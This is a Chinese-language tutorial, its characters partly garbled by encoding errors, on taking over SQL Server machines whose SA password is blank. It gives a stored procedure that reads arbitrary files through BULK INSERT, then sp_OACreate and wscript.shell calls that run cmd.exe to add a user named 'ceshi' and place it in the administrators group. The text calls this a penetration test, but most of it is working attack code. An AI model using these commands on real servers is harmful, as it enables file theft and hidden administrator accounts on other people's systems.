- 相關(guān)推薦
利用存儲過程控制SA口令為空的SQLServer服務(wù)器的方法
前幾天朋友找我,讓我?guī)兔y試一下他們的服務(wù)器,經(jīng)過掃描后發(fā)現(xiàn)SQLServer的SA為空,決定利用這個漏洞做滲透測試。經(jīng)過測試發(fā)現(xiàn)存儲過程 Xp_cmdshell以及讀取注冊表系列的存儲過程都被刪除了,并且Xplog70.dll也被刪除,所以無法執(zhí)行CMD命令和克隆管理員帳號了,看樣子是經(jīng)過安全配置的,這種情況據(jù)我當(dāng)時掌握的知識是沒辦法入侵的。以前也遇到過類似的機器,所以決定利用幾天的時間解決這個問題。經(jīng)過兩天的查閱資料和測試,實現(xiàn)了不需要使用任何SQLServer自帶的存儲過程就可以從目標(biāo)機上得到txt、asp等類型文件的內(nèi)容(前提是知道SA 密碼或者SA密碼為空),實現(xiàn)過程就是自己建立一個臨時表,然后將文件讀到表中,再用SELECT語句得到返回值,即文件的內(nèi)容。我們可以在查詢分析器里先寫入一個存儲過程,然后執(zhí)行,在需要的時候只要調(diào)用該存儲過程即可:
Create proc sp_readTextFile @filename sysname
as
begin
set nocount on
Create table #tempfile (line varchar(8000))
exec ('bulk insert #tempfile from "' + @filename + '"')
select * from #tempfile
drop table #tempfile
End
go
這樣我們只要執(zhí)行類似下面的語句就可以得到指定路徑下文件的內(nèi)容:
exec sp_readTextFile 'c:\aaa.asp'
實現(xiàn)這個功能后,本打算通過讀取朋友服務(wù)器上網(wǎng)站的asp代碼,做進(jìn)一步的入侵,可是后來發(fā)現(xiàn),因為不知道網(wǎng)站asp文件的絕對路徑,所以這個功能根本用不上,只好作罷,另找其他方法。在這之后的幾天時間里,我想到了使用安全文章經(jīng)常提到OLE相關(guān)的一系列存儲過程,這一系列的存儲過程同 Xp_cmdshell以及讀取注冊表系列的存儲過程一樣危險,但是其使用方法不象那些存儲過程在網(wǎng)絡(luò)上和書上介紹的那樣多,這系列的存儲過程有 sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod, sp_OASetProperty,sp_OAStop,下面我講一下通過查閱資料得到的使用方法:
打開查詢分析器,然后使用SA與目標(biāo)機連接上,在查詢分析器里執(zhí)行:
DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user
ceshi 1 /add'--
這樣對方系統(tǒng)增加了一個用戶名為ceshi,密碼為1的用戶,再執(zhí)行:
DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup
administrators ceshi /add '--
用戶ceshi,被加入管理員組。
總結(jié):通過這次滲透測試,又學(xué)到了一種利用存儲過程控制SA為空的SQLServer服務(wù)器的方法。
【利用存儲過程控制SA口令為空的SQLServer服務(wù)器的方法】相關(guān)文章:
以過程為話題的作文08-17
以過程為話題的作文11-07
過程裝備與控制工程就業(yè)前景07-20
利用口令法提高學(xué)生隊列訓(xùn)練的興趣08-21
基于伯努利大數(shù)定律的云存儲數(shù)據(jù)方法研究08-18
以享受過程為話題作文02-25
以過程為話題的作文2篇12-24
控制槍支的方法 The Way to Control Gun05-11
過程裝備與控制工程專業(yè)學(xué)生求職信05-28
利用PXE批量克隆機器的一些方法08-18